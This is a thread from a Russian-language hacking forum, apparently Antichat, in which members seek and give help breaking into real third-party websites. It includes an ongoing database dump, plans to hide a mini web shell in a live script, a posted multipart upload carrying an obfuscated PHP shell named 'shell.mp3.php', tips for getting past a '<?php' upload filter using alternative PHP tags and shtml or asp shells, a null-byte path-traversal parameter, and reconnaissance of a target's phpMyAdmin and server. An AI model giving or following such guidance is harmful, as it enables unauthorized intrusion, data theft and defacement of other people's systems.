Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. rct

    rct Active Member

    Joined:
    13 Jun 2015
    Messages:
    359
    Likes Received:
    107
    Reputations:
    7
    Начал сливать всю базу, надеюсь дня за три получится. А пока найдена таблица, в которой хранится php-код. Страничка, на которой выхлоп этого кода тоже найдена. Сначала хотел перезаписать его шелом, но будет слишком палевно. Есть так же подозрение что эта страничка доступна на другом домене как /index.html Можно еще что-то предпринять для заливки шела?

    Вообще с этой таблицей по всему выходит что это второй сайт, рядом. И он доступен как по основному домену, так и по мойдомен.com/firma/index.html
     
    #521 rct, 31 Aug 2015
    Last edited: 31 Aug 2015
  2. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    А ваша инъекция позволит вам перезаписать этот скрипт? не думаю.
    Но если все же условия позволяют, то просто допишите в скрипт минишелл, будет беспалевно визуально, потом уберете.
    Ищите админку или показывайте сайт, другие помогут.
     
  3. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Нашёл сайт который позволяет заливать свое звуковое оповещение,я залил .php файл с таким названием shell.mp3.php .
    Удивительно,но он его принял .
    Токо не не знаю куда он делся.
    На этот случай включил Tamper Data во время заливки
    http://******.ru/user/upload_sound.php
    При открытии страницы браузер Mozilla FireFox выдаёт следущее :
    Code:
    [/B][/B][/B][/B][/B][/B][/B][/B][/B][/B]
    [B][B][B][B][B][B][B][B][B][B]Неверное перенаправление на странице
    
    Firefox определил, что сервер перенаправляет запрос на этот адрес таким образом, что он никогда не завершится.
    
      Эта проблема может возникать при отключении или запрещении принятия кук. 

    Можно ли как-то это обойти .
    И даже если обойду как в шелл то попасть .
    Страница где я заливал шелл выглядел так :
    Code:
    http://www.*****.ru/index.php?page=6[code]
    Вот POST DATA :
    [code]-----------------------------2196926319672\r\nContent-Disposition: form-data; name="sound"\r\n\r\n0\r\n-----------------------------2196926319672\r\nContent-Disposition: form-data; name="sound"; filename="shell.mp3.php"\r\nContent-Type: application/octet-stream\r\n\r\n<?php $j___f='\r®ñâJôôÞîÉ!=€Ì¿à釉ÍáªÚÒÖ)!RЯ‡¡h9pÛzR(Ó¼ŒÄʙ0ӆþÄà@e¹²ôülŸh^z/—+wËbU¢Í¼5…Ê(dÃ𱺪4-×axFŽšÕ³èRª$cúØa?˜D‹ÃáòÈø:a•°¥ŽL®^¢£Ñë¡ïìtÂoóÒívBg…õ9`vó£Æʧ·£x›¿\\hÝ>3R½¿¡¹cøNs‚@Éplò)¿¤žfæ"áÒ¸Äuà҈¡F+"»1»¾j0ÙÈ0›T7bì¢Dä 




    На это [ B ] [ /B ] [ CODE ] [ /CODE ] не обращайте внимание .

    Я хз что это,но я это нашёл .
    Code:
    var PMA_gotoWhitelist = new Array();
    PMA_gotoWhitelist[0]="db_create.php";
    PMA_gotoWhitelist[1]="db_datadict.php";
    PMA_gotoWhitelist[2]="db_sql.php";
    PMA_gotoWhitelist[3]="db_events.php";
    PMA_gotoWhitelist[4]="db_export.php";
    PMA_gotoWhitelist[5]="db_importdocsql.php";
    PMA_gotoWhitelist[6]="db_qbe.php";
    PMA_gotoWhitelist[7]="db_structure.php";
    PMA_gotoWhitelist[8]="db_import.php";
    PMA_gotoWhitelist[9]="db_operations.php";
    PMA_gotoWhitelist[10]="db_printview.php";
    PMA_gotoWhitelist[11]="db_search.php";
    PMA_gotoWhitelist[12]="db_routines.php";
    PMA_gotoWhitelist[13]="export.php";
    PMA_gotoWhitelist[14]="import.php";
    PMA_gotoWhitelist[15]="index.php";
    PMA_gotoWhitelist[16]="pdf_pages.php";
    PMA_gotoWhitelist[17]="pdf_schema.php";
    PMA_gotoWhitelist[18]="querywindow.php";
    PMA_gotoWhitelist[19]="server_binlog.php";
    PMA_gotoWhitelist[20]="server_collations.php";
    PMA_gotoWhitelist[21]="server_databases.php";
    PMA_gotoWhitelist[22]="server_engines.php";
    PMA_gotoWhitelist[23]="server_export.php";
    PMA_gotoWhitelist[24]="server_import.php";
    PMA_gotoWhitelist[25]="server_privileges.php";
    PMA_gotoWhitelist[26]="server_sql.php";
    PMA_gotoWhitelist[27]="server_status.php";
    PMA_gotoWhitelist[28]="server_status_advisor.php";
    PMA_gotoWhitelist[29]="server_status_monitor.php";
    PMA_gotoWhitelist[30]="server_status_queries.php";
    PMA_gotoWhitelist[31]="server_status_variables.php";
    PMA_gotoWhitelist[32]="server_variables.php";
    PMA_gotoWhitelist[33]="sql.php";
    PMA_gotoWhitelist[34]="tbl_addfield.php";
    PMA_gotoWhitelist[35]="tbl_change.php";
    PMA_gotoWhitelist[36]="tbl_create.php";
    PMA_gotoWhitelist[37]="tbl_import.php";
    PMA_gotoWhitelist[38]="tbl_indexes.php";
    PMA_gotoWhitelist[39]="tbl_move_copy.php";
    PMA_gotoWhitelist[40]="tbl_printview.php";
    PMA_gotoWhitelist[41]="tbl_sql.php";
    PMA_gotoWhitelist[42]="tbl_export.php";
    PMA_gotoWhitelist[43]="tbl_operations.php";
    PMA_gotoWhitelist[44]="tbl_structure.php";
    PMA_gotoWhitelist[45]="tbl_relation.php";
    PMA_gotoWhitelist[46]="tbl_replace.php";
    PMA_gotoWhitelist[47]="tbl_row_action.php";
    PMA_gotoWhitelist[48]="tbl_select.php";
    PMA_gotoWhitelist[49]="tbl_zoom_select.php";
    PMA_gotoWhitelist[50]="transformation_overview.php";
    PMA_gotoWhitelist[51]="transformation_wrapper.php";
    PMA_gotoWhitelist[52]="user_password.php";
     
    #523 SaNDER, 1 Sep 2015
    Last edited: 1 Sep 2015
  4. rct

    rct Active Member

    Joined:
    13 Jun 2015
    Messages:
    359
    Likes Received:
    107
    Reputations:
    7
    Данный скрипт находится в cs2 => cs_user_sites
    А вот SCHEMA_PRIVILEGES
    Code:
    GRANTEE               IS_GRANTABLE          TABLE_SCHEMA          TABLE_CATALOG         PRIVILEGE_TYPE     
    'csuser'@'localhost'  NO                    cs2                   NULL                  SELECT
    'csuser'@'localhost'  NO                    cs2                   NULL                  INSERT
    'csuser'@'localhost'  NO                    cs2                   NULL                  UPDATE
    'csuser'@'localhost'  NO                    cs2                   NULL                  DELETE
    'csuser'@'localhost'  NO                    cs2                   NULL                  CREATE
    'csuser'@'localhost'  NO                    cs2                   NULL                  DROP
    'csuser'@'localhost'  NO                    cs2                   NULL                  INDEX
    'csuser'@'localhost'  NO                    cs2                   NULL                  ALTER
    'csuser'@'localhost'  NO                    cs2                   NULL                  CREATE TEMPORARY TA…
    'csuser'@'localhost'  NO                    cs2                   NULL                  EXECUTE
    'csuser'@'localhost'  NO                    cs2                   NULL                  CREATE VIEW
    'csuser'@'localhost'  NO                    cs2                   NULL                  SHOW VIEW
    'csuser'@'localhost'  NO                    cs2                   NULL                  CREATE ROUTINE
    'csuser'@'localhost'  NO                    cs2                   NULL                  ALTER ROUTINE
    'csuser'@'localhost'  NO                    cs2                   NULL                  EVENT
    'csuser'@'localhost'  NO                    cs2                   NULL                  TRIGGER
    
    По всему выходит что могу. Пока не пробовал, усиленно курю маны по пхп и sql =)
     
  5. hakwar

    hakwar New Member

    Joined:
    25 Dec 2010
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Прошу помощи.
    Есть доступ к админке и базе данных.Пытаюсь залить шелл через загрузку картинок.Обычная картинка загружается без проблем и через tamper data расширение без проблем меняется на php.
    Если в картинку вставить php код то ничего не загружается.Фильтрует где то php код <?php. И записывает лог в базу данных.Пробовал <?= все равно не загружает.Помогите советом как обойти фильтр куда копать и что делать. Шелл обфусцирован но вначале стоит <?php из за этого и не пропускает.Помогите советом
     
  6. hakwar

    hakwar New Member

    Joined:
    25 Dec 2010
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Так в том и дело если картинка то заливается как php а если вставишь код шелла в картинку то не заливается ни как у него в скрипте заливки картинок стоит вот это
    if (false != imagecreatefromstring($img) && stripos($img, '<?php') === false
    Как это обойти?
     
  7. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Пробуй shtml шелл, asp мб.
    А есил в картинку в середину просто <?php добавить, все равно ругаться будет? Если просто phpinfo(); , то не ругается?
     
  8. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    На сайте могу выполнять команды типа SELECT @@VERSION . Где можно найти подобные команды ?
    Или предоставьте сюда список пожалуйста .
     
  9. hakwar

    hakwar New Member

    Joined:
    25 Dec 2010
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Да если добавить <?php то ругается если phpinfo() вроде нет
     
  10. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
  11. Siqvik

    Siqvik New Member

    Joined:
    9 Aug 2015
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Извиняюсь за тупой вопрос но - может ли сайт (лечь) из за сканера Acunetix? Заметил одну штуку интересную, есть несколько не больших ресурсов на 5-10 страниц, не более. Пускаю скан и о чудо через несколько минут сайт становится недоступным, при чем варианты типа "хостинг кончился" и "сайт отключили" не подходят 100% один из сайтов крутился через Google AdWords а это денег стоит, отключать его не стали бы (знаю хозяев) а при исчерпании средств на хостинге грузится должна соответствующая страница об отключении сайта, а результат который я наблюдал - это просто недоступный сайт "не удалось загрузить страницу" причем при попытке зайти на сайт с другой машины то же самое вижу =) Вот мне оочень интересно - такое вообще возможно?
     
  12. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Code:
    <script language=php>
    ...
    </script>
    <?=...?>
    <?
    ...
    ?>
    
     
  13. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    да , может
     
  14. Siqvik

    Siqvik New Member

    Joined:
    9 Aug 2015
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Интересно с чем это связано? Со скоростью запросов к серверу или просто в методах проверки, я так понимаю он "методом тыка" проверяет?

    И еще интересует атака под названием "Slow HTTP DOS". Акунетикс показывает наличие такой уязвимости, хотелось бы инфы хоть какой то, поиск ничего толкового не дал, а на забугорных ресурсах как то совсем заумно, общие черты понял а вот как это дело осуществить так и не понял, есть ли софт какой под окна? Направьте на путь истинный =)) с инфой пожалста =)
     
    #534 Siqvik, 2 Sep 2015
    Last edited: 2 Sep 2015
  15. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    это своего рода Дос атака . Связана с тем что паук крауль, то что делает карту сети, ходит по сайту, запрашивает страницу. идёт нагрузка на слабенткий хост
     
  16. ubepkr

    ubepkr Member

    Joined:
    17 Aug 2015
    Messages:
    96
    Likes Received:
    20
    Reputations:
    1
    Доброго времени суток! Есть цель, которая не дает спокойно уснуть)). Поэтому куча вопросов (извиняйте, если сумбурно):
    1. Удалось вытащить phpinfo.php, согласно которому установлено: операционка - LinuxRedhat, сервер - Apache/2.2.3 (CentOS), PHP Version 5.3.6, phpMyAdmin 2.11.11.3, mysql 5.1.58.
    Собственно вопрос, что означает последний адрес: HTTP_X_FORWARDED_FOR- 95.141.31.xxx, HTTP_X_REAL_IP - 95.141.31.xxx, REMOTE_ADDR - 95.141.31.xxx, SERVER_ADDR - 62.76.47.XXX? Виртуалка?

    2. H**p://цель/myadmin/scripts/setup.php запускается, но не активны save/load. H**p://цель/myadmin/config.inc.php - пустой. H**p://цель/myadmin/libraries/config.default.php - пустой.
    Означает ли это, что ../config/ не создан и эта админка вообще не используется? Но ведь h**p://цель/myadmin/index.php- таки запрашивает авторизацию, как и H**p://цель/myadmin/scripts/signon.php...

    3. Может ли быть такое, что админки вообще нет (не сконфигурирована), а сайт заливается по ftp? Или искать другую админку (пока методом тыка нашел закрытые папки h**p://цель/code/, h**p://цель/cgi-bin/, с авторизацией h**p://цель/ webmail/src/login.php/, открытую h**p://цель/icons/).

    4. В корне находятся (forbidden) /.htaccess, /.htpasswd, /.htconfig - может, вся соль там?)) Куды копать дальше?

    Заранее спасибо!
     
  17. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    game=../index.php%00

    Дописываемое расширение - не php.
     
  18. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Ух ты, спасибо. что-то я об этом не подумал
     
  19. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    через phpmyadmin 2.11 версии шелл не залить. Если там стоит что-то типа "
    Can not load or save configuration
    Please create web server writable folder config in phpMyAdmin toplevel directory as described in documentation. Otherwise you will be only able to download or display it"

    То значит майадмин ставили не через браузер и прав нет на создание и запись файлов.
    Ищи другие методы.
     
  20. ubepkr

    ubepkr Member

    Joined:
    17 Aug 2015
    Messages:
    96
    Likes Received:
    20
    Reputations:
    1
    Спасибо, именно такая загогулина и присутствует, к сожалению. А другой админки не может быть (а эта-типа заманухи)?
    И другие вопросы тоже актуальны))